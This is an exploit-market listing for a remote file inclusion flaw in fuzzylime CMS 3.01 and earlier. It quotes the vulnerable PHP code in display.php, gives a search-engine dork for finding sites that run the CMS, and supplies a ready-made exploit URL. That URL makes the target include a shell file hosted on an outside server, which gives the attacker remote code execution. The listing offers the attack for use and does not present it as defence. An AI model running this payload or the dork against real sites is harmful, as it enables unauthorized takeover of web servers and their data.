[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

fuzzylime cms <= 3.01 (admindir) Remote File Inclusion Vulnerability

Author
irk4z
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2743
Category
web applications
Date add
14-03-2008
Platform
unsorted
====================================================================
fuzzylime cms <= 3.01 (admindir) Remote File Inclusion Vulnerability
====================================================================



.-----------------------------------------------------------------------------.
|  vuln.: fuzzylime cms <= 3.01 Remote File Inclusion Vulnerability           |
|  download: http://cms.fuzzylime.co.uk/                                      |
|  dork: "powered by fuzzylime"                                               |
|                                                                             |
|                                                                             |
'-----------------------------------------------------------------------------'

# code:

  /code/display.php:
  ... 
1    <?
2    $s = $_GET[s];
3    $p = $_GET[p];
4    $s = str_replace("../", "", $s);
5    $p = str_replace("../", "", $p);
6    if(empty($s)) $s = "front";
7    if(empty($p)) $p = "index";
8    $curs = $s;
9    $curp = $p;
10
11   include "code/settings.inc.php";
12   include "${admindir}/languages/english.inc.php";
 ...

 line 11: ./code/code/settings.inc.php not exists so $admindir is empty :D:D
 
# exploit: 
 
 http://[HOST]/[PATH]/code/display.php?admindir=http://host/shell.txt?



#  0day.today [2024-12-24]  #